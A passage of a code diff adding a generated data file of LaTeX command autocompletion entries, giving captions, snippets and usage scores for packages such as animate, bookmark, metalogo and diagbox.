'\\frenchspacing', + meta: 'xfrac-cmd', + score: 0.0063276692758974925, + }, + ], + shortvrb: [ + { + caption: '\\MakeShortVerb{}', + snippet: '\\MakeShortVerb{$1}', + meta: 'shortvrb-cmd', + score: 0.0002890733176655595, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'shortvrb-cmd', + score: 0.009278344180101056, + }, + ], + animate: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'animate-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'animate-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'animate-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'animate-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'animate-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'animate-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'animate-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'animate-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'animate-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'animate-cmd', + score: 0.004649150613625593, + }, + { + caption: 
'\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'animate-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'animate-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'animate-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'animate-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'animate-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'animate-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'animate-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'animate-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'animate-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'animate-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'animate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'animate-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'animate-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'animate-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'animate-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'animate-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'animate-cmd', + score: 0.008565354665444157, + }, + ], + euscript: [ + { + caption: '\\mathscr{}', + snippet: '\\mathscr{$1}', + meta: 'euscript-cmd', + score: 0.025302230226027712, + }, + { + caption: '\\mathcal{}', + snippet: '\\mathcal{$1}', + meta: 'euscript-cmd', + score: 0.35084018920966636, + }, + ], + hhline: [ + { + caption: '\\hhline{}', + snippet: '\\hhline{$1}', + meta: 'hhline-cmd', + score: 0.0004816338278157677, + }, + ], + subfiles: [ + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'subfiles-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'subfiles-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\subfile{}', + snippet: '\\subfile{$1}', + meta: 'subfiles-cmd', + score: 0.03337062633525651, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'subfiles-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'subfiles-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'subfiles-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'subfiles-cmd', + score: 0.021170869458413965, + 
}, + { + caption: '\\par', + snippet: '\\par', + meta: 'subfiles-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'subfiles-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'subfiles-cmd', + score: 0.0024547099784948665, + }, + ], + accents: [ + { + caption: '\\underaccent{}{}', + snippet: '\\underaccent{$1}{$2}', + meta: 'accents-cmd', + score: 0.00109513727836357, + }, + ], + theorem: [ + { + caption: '\\theorembodyfont{}', + snippet: '\\theorembodyfont{$1}', + meta: 'theorem-cmd', + score: 0.00047103366488576113, + }, + ], + metalogo: [ + { + caption: '\\XeTeX', + snippet: '\\XeTeX', + meta: 'metalogo-cmd', + score: 0.0010635559050357936, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'metalogo-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'metalogo-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'metalogo-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'metalogo-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\XeLaTeX', + snippet: '\\XeLaTeX', + meta: 'metalogo-cmd', + score: 0.002009786035379175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'metalogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'metalogo-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'metalogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'metalogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'metalogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'metalogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'metalogo-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'metalogo-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'metalogo-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'metalogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'metalogo-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: 
'\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'metalogo-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + ], + bookmark: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\bookmarkget{}', + snippet: '\\bookmarkget{$1}', + meta: 'bookmark-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\bookmarksetup{}', + snippet: '\\bookmarksetup{$1}', + meta: 'bookmark-cmd', + score: 0.001134118016265821, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'bookmark-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'bookmark-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'bookmark-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'bookmark-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'bookmark-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'bookmark-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'bookmark-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'bookmark-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'bookmark-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'bookmark-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'bookmark-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'bookmark-cmd', + score: 
0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'bookmark-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'bookmark-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'bookmark-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'bookmark-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'bookmark-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bookmark-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'bookmark-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'bookmark-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'bookmark-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'bookmark-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'bookmark-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'bookmark-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'bookmark-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.0073781967296121, + }, + { + 
caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'bookmark-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'bookmark-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'bookmark-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'bookmark-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'bookmark-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'bookmark-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'bookmark-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'bookmark-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'bookmark-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'bookmark-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'bookmark-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'bookmark-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'bookmark-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'bookmark-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'bookmark-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'bookmark-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'bookmark-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'bookmark-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'bookmark-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'bookmark-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'bookmark-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'bookmark-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'bookmark-cmd', + score: 7.847906405228455, + }, + { + 
caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'bookmark-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'bookmark-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'bookmark-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'bookmark-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'bookmark-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'bookmark-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'bookmark-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'bookmark-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'bookmark-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'bookmark-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'bookmark-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'bookmark-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'bookmark-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'bookmark-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'bookmark-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'bookmark-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'bookmark-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'bookmark-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'bookmark-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'bookmark-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'bookmark-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'bookmark-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + 
caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'bookmark-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'bookmark-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'bookmark-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 
0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + ], + anysize: [ + { + caption: '\\marginsize{}{}{}{}', + snippet: '\\marginsize{$1}{$2}{$3}{$4}', + meta: 'anysize-cmd', + score: 0.0012034744434699038, + }, + ], + diagbox: [ + { + caption: '\\diagbox[]{}{}', + snippet: '\\diagbox[$1]{$2}{$3}', + meta: 'diagbox-cmd', + score: 2.2176553306779127e-5, + }, + { + caption: '\\backslashbox{}{}', + snippet: '\\backslashbox{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.0005060776550832729, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\Line', + snippet: '\\Line', + meta: 'diagbox-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'diagbox-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'diagbox-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'diagbox-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'diagbox-cmd', + score: 0.002970308722584179, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 